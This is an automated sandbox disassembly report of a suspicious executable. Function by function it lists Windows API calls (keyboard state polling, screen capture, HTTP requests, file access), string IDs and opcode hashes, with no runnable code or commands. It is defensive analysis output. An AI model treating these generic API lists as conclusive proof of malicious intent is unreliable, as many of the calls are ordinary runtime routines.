                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                              • API String ID: 66158676-1714406822
                                              • Opcode ID: 73d71be3f45716419851edab87ff0816321c4871aef08c8ebe758cf137596f1c
                                              • Instruction ID: d79243e1da296b44d0306a13450566d4b53e1db01a0d448552497401d2715797
                                              • Opcode Fuzzy Hash: 73d71be3f45716419851edab87ff0816321c4871aef08c8ebe758cf137596f1c
                                              • Instruction Fuzzy Hash: 8521F632A457147FE7216BA8BC15BA937E4EB0EB65F015129F911BA290DF60BC009A51
                                              Function 00EF4E1A Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(00000000,00000000,00F1DCD0), ref: 00EF4E81
                                              • _wcslen.LIBCMT ref: 00EF4E95
                                              • _wcslen.LIBCMT ref: 00EF4EF3
                                              • _wcslen.LIBCMT ref: 00EF4F4E
                                              • _wcslen.LIBCMT ref: 00EF4F99
                                              • _wcslen.LIBCMT ref: 00EF5001
                                                • Part of subcall function 00E9FD60: _wcslen.LIBCMT ref: 00E9FD6B
                                              • GetDriveTypeW.KERNEL32(?,00F47C10,00000061), ref: 00EF509D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharDriveLowerType
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2055661098-1000479233
                                              • Opcode ID: 79f9199ff878ab1edea0c026233e2f74df86987b2544cc890b9ca9d78aa4ecdf
                                              • Instruction ID: 61b7ada767cdeb0f14f34a8d771ef6cab4e79892939819b1d9125d001eae5856
                                              • Opcode Fuzzy Hash: 79f9199ff878ab1edea0c026233e2f74df86987b2544cc890b9ca9d78aa4ecdf
                                              • Instruction Fuzzy Hash: 1EB107722087069FC710EF28C890A7BB7E5FFA4714F50691DF699A7292DB30D844C792
                                              Function 00F04946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00F1DCD0), ref: 00F04A18
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F04A2A
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00F1DCD0), ref: 00F04A4F
                                              • FreeLibrary.KERNEL32(00000000,?,00F1DCD0), ref: 00F04A9B
                                              • StringFromGUID2.OLE32(?,?,00000028,?,00F1DCD0), ref: 00F04B05
                                              • SysFreeString.OLEAUT32(00000009), ref: 00F04BBF
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F04C25
                                              • SysFreeString.OLEAUT32(?), ref: 00F04C4F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 354098117-199464113
                                              • Opcode ID: 529eaa99d7101377b4564f3771126cf2e3cdf04d35bc4c8dd22179b4f1d00122
                                              • Instruction ID: be709c53919f2ab27a11ef5ad27e85647eae25df2f4b33e8fe75119240a7534a
                                              • Opcode Fuzzy Hash: 529eaa99d7101377b4564f3771126cf2e3cdf04d35bc4c8dd22179b4f1d00122
                                              • Instruction Fuzzy Hash: 55123FB1A00119EFDB14DF54C884EAEB7B5FF85314F148098EA19AB291D731FD46EBA0
                                              Function 00EFCDD3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EFCE0D
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EFCE20
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EFCE34
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EFCE4D
                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EFCE90
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EFCEA6
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EFCEB1
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EFCEE1
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EFCF39
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EFCF4D
                                              • InternetCloseHandle.WININET(00000000), ref: 00EFCF58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                              • String ID:
                                              • API String ID: 3800310941-3916222277
                                              • Opcode ID: 03b96e64136fcdcca751c6ab6bcef07550a66056282c7d5bb6e7014ba6c5f5e4
                                              • Instruction ID: d81068cdb5de691a233d7b7190f4290704ea4b26d8e462b7783c9d93481b5914
                                              • Opcode Fuzzy Hash: 03b96e64136fcdcca751c6ab6bcef07550a66056282c7d5bb6e7014ba6c5f5e4
                                              • Instruction Fuzzy Hash: 28515E7160060CBFDB219F60CE48ABABBFDFF08758F209419FA49A6150D735D944ABA0
                                              Function 00F18ECE Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00F18EF1
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F01
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F0C
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F19
                                              • GlobalLock.KERNEL32(00000000), ref: 00F18F27
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F36
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00F18F3F
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F46
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00F18F57
                                              • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00F20C04,?), ref: 00F18F70
                                              • GlobalFree.KERNEL32(00000000), ref: 00F18F80
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00F18FA0
                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00F18FD0
                                              • DeleteObject.GDI32(?), ref: 00F18FF8
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F1900E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: d54d1fbd04f61270e334ae7d2985c4efaa51bc2e9b4c2fe03c6098577b5d8c5f
                                              • Instruction ID: 825ea67e640dcb0e905eefe3806e774003d9275075360cc8bdaa347ed9768e99
                                              • Opcode Fuzzy Hash: d54d1fbd04f61270e334ae7d2985c4efaa51bc2e9b4c2fe03c6098577b5d8c5f
                                              • Instruction Fuzzy Hash: 0B413A71600208BFDB11DF65DD88EEA7BB9FF89761F118058F915E7260DB709942EB20
                                              Function 00F02EB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00F02F35
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F02F45
                                              • CreateCompatibleDC.GDI32(?), ref: 00F02F51
                                              • SelectObject.GDI32(00000000,?), ref: 00F02F5E
                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F02FCA
                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F03009
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F0302D
                                              • SelectObject.GDI32(?,?), ref: 00F03035
                                              • DeleteObject.GDI32(?), ref: 00F0303E
                                              • DeleteDC.GDI32(?), ref: 00F03045
                                              • ReleaseDC.USER32(00000000,?), ref: 00F03050
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: 936edd2943b5afb2d9c2c99e086e27c2f1cbd3918ad556345a614453315f3634
                                              • Instruction ID: c2274db9ac1a69df1e826d247d1dfed79e00c9aad519cb68bc1855fc33d4ca00
                                              • Opcode Fuzzy Hash: 936edd2943b5afb2d9c2c99e086e27c2f1cbd3918ad556345a614453315f3634
                                              • Instruction Fuzzy Hash: 0D61E2B5E00219EFDF04CFA4D884AAEBBF6FF48310F208519E955A7250D775A941EFA0
                                              Function 00EEC80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(00F52990,000000FF,00000000,00000030), ref: 00EEC888
                                              • SetMenuItemInfoW.USER32(00F52990,00000004,00000000,00000030), ref: 00EEC8BD
                                              • Sleep.KERNEL32(000001F4), ref: 00EEC8CF
                                              • GetMenuItemCount.USER32(?), ref: 00EEC915
                                              • GetMenuItemID.USER32(?,00000000), ref: 00EEC932
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00EEC95E
                                              • GetMenuItemID.USER32(?,?), ref: 00EEC9A5
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EEC9EB
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EECA00
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EECA21
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                              • String ID: 0
                                              • API String ID: 1460738036-4108050209
                                              • Opcode ID: 03824f8bcd2da740a164158e652958fb83e44250df2b692f2eef5e3c2d4316dc
                                              • Instruction ID: ce1a3166c378da454f0a33d0b87d618e3d30a69c743c1edaf22ebc66922db2e6
                                              • Opcode Fuzzy Hash: 03824f8bcd2da740a164158e652958fb83e44250df2b692f2eef5e3c2d4316dc
                                              • Instruction Fuzzy Hash: 81619E7090028DABDF15CF69D888AFE7BB9FB45308F245129E945B3251D735AD02DB60
                                              Function 00EEE3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00EEE3E9
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00EEE40F
                                              • _wcslen.LIBCMT ref: 00EEE419
                                              • _wcsstr.LIBVCRUNTIME ref: 00EEE469
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00EEE485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 1939486746-1459072770
                                              • Opcode ID: 83d93b8985123193b9f5dbdcabc6e469e6abf1cd8bd971772fe21617c633485f
                                              • Instruction ID: d62863c943bfe226fd5b36e34356cbfa68620321a8132936017210d3afffa5dd
                                              • Opcode Fuzzy Hash: 83d93b8985123193b9f5dbdcabc6e469e6abf1cd8bd971772fe21617c633485f
                                              • Instruction Fuzzy Hash: B441F5726402187AEB00BB658C47EFF7BBCDF5A710F105425F905BA1C2EB74EA01A6A5
                                              Function 00EF4678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EF469A
                                              • _wcslen.LIBCMT ref: 00EF46C7
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EF46F7
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EF4718
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00EF4728
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EF47AF
                                              • CloseHandle.KERNEL32(00000000), ref: 00EF47BA
                                              • CloseHandle.KERNEL32(00000000), ref: 00EF47C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                              • String ID: :$\$\??\%s
                                              • API String ID: 1149970189-3457252023
                                              • Opcode ID: 81ed05ae963a57f0b925ab7167653066634ae5a561873a02f27632ad25b9087d
                                              • Instruction ID: 6bdc4d785cac455d4ed74455d94cf7a0bbc4082a012643a5637f8c47e4f899ff
                                              • Opcode Fuzzy Hash: 81ed05ae963a57f0b925ab7167653066634ae5a561873a02f27632ad25b9087d
                                              • Instruction Fuzzy Hash: CB31D4B190024DABDB20AFA0DC48FFB37BDEF89744F1051AAF615E61A0E77497449B24
                                              Function 00EEEEDC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • timeGetTime.WINMM ref: 00EEEEE0
                                                • Part of subcall function 00E9F27E: timeGetTime.WINMM(?,?,00EEEF00), ref: 00E9F282
                                              • Sleep.KERNEL32(0000000A), ref: 00EEEF0D
                                              • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 00EEEF31
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EEEF53
                                              • SetActiveWindow.USER32 ref: 00EEEF72
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EEEF80
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EEEF9F
                                              • Sleep.KERNEL32(000000FA), ref: 00EEEFAA
                                              • IsWindow.USER32 ref: 00EEEFB6
                                              • EndDialog.USER32(00000000), ref: 00EEEFC7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: 9f6aeffa84fbdd1bd0a6b835eda192b9bff8e217c1463a670ea7af3365cf9d60
                                              • Instruction ID: 419e15d647f275aec3fcbfcd650a0a2f1ce9259b31e5ed91d2e2a1e53cbc8b36
                                              • Opcode Fuzzy Hash: 9f6aeffa84fbdd1bd0a6b835eda192b9bff8e217c1463a670ea7af3365cf9d60
                                              • Instruction Fuzzy Hash: 4C21967020034DBFEB006F65EC89E663B7AFB4538AB155418F611A13B1CB758D01F664
                                              Function 00EEA86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00EEA8EE
                                              • SetKeyboardState.USER32(?), ref: 00EEA959
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00EEA979
                                              • GetKeyState.USER32(000000A0), ref: 00EEA990
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00EEA9BF
                                              • GetKeyState.USER32(000000A1), ref: 00EEA9D0
                                              • GetAsyncKeyState.USER32(00000011), ref: 00EEA9FC
                                              • GetKeyState.USER32(00000011), ref: 00EEAA0A
                                              • GetAsyncKeyState.USER32(00000012), ref: 00EEAA33
                                              • GetKeyState.USER32(00000012), ref: 00EEAA41
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00EEAA6A
                                              • GetKeyState.USER32(0000005B), ref: 00EEAA78
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 59fbd1abfba40131e06bbab54a562353ee3bde65a534801da4dd35fa8e371551
                                              • Instruction ID: 1bae88b9a828e8a7cc26f92eb81b0099f98dc460c72797bfce103ad3c156a713
                                              • Opcode Fuzzy Hash: 59fbd1abfba40131e06bbab54a562353ee3bde65a534801da4dd35fa8e371551
                                              • Instruction Fuzzy Hash: 1651D7309047CC69EB35DBA288547EABFF49F11344F4C95ADC5C62B1C3DA54AA4CC762
                                              Function 00EE6555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00EE6571
                                              • GetWindowRect.USER32(00000000,?), ref: 00EE658A
                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00EE65E8
                                              • GetDlgItem.USER32(?,00000002), ref: 00EE65F8
                                              • GetWindowRect.USER32(00000000,?), ref: 00EE660A
                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00EE665E
                                              • GetDlgItem.USER32(?,000003E9), ref: 00EE666C
                                              • GetWindowRect.USER32(00000000,?), ref: 00EE667E
                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00EE66C0
                                              • GetDlgItem.USER32(?,000003EA), ref: 00EE66D3
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EE66E9
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00EE66F6
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: ff44dc90fc88892c629aaf81fa688952509a440729546ea0b4206d9ee7e89c16
                                              • Instruction ID: e6307ef564cab8b2e7400926f5ad4c833c7ed570363fa45c17e19c7190fd3c09
                                              • Opcode Fuzzy Hash: ff44dc90fc88892c629aaf81fa688952509a440729546ea0b4206d9ee7e89c16
                                              • Instruction Fuzzy Hash: 125141B0B10219AFDF08CF69DD99AAEBBB5FB58304F118129F919E7290D7709D04CB50
                                              Function 00E820D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E821E4: GetWindowLongW.USER32(?,000000EB), ref: 00E821F2
                                              • GetSysColor.USER32(0000000F), ref: 00E82102
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: ec3f93a1554c3ccc8c81bd91a6f1250f997411fb7a2f67bae336c89cad0afdfa
                                              • Instruction ID: 05e9950d19af9583c6415d4f53874925df03abb7d3c7fdff079b36f8104d1ca0
                                              • Opcode Fuzzy Hash: ec3f93a1554c3ccc8c81bd91a6f1250f997411fb7a2f67bae336c89cad0afdfa
                                              • Instruction Fuzzy Hash: 6C41C831101654AFDB206F389C48BBA7775AB45324F25964DFBAAA72E1C7318D42D710
                                              Function 00F148F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F1499A
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00F149A1
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F149B4
                                              • SelectObject.GDI32(00000000,00000000), ref: 00F149BC
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F149C7
                                              • DeleteDC.GDI32(00000000), ref: 00F149D1
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00F149DB
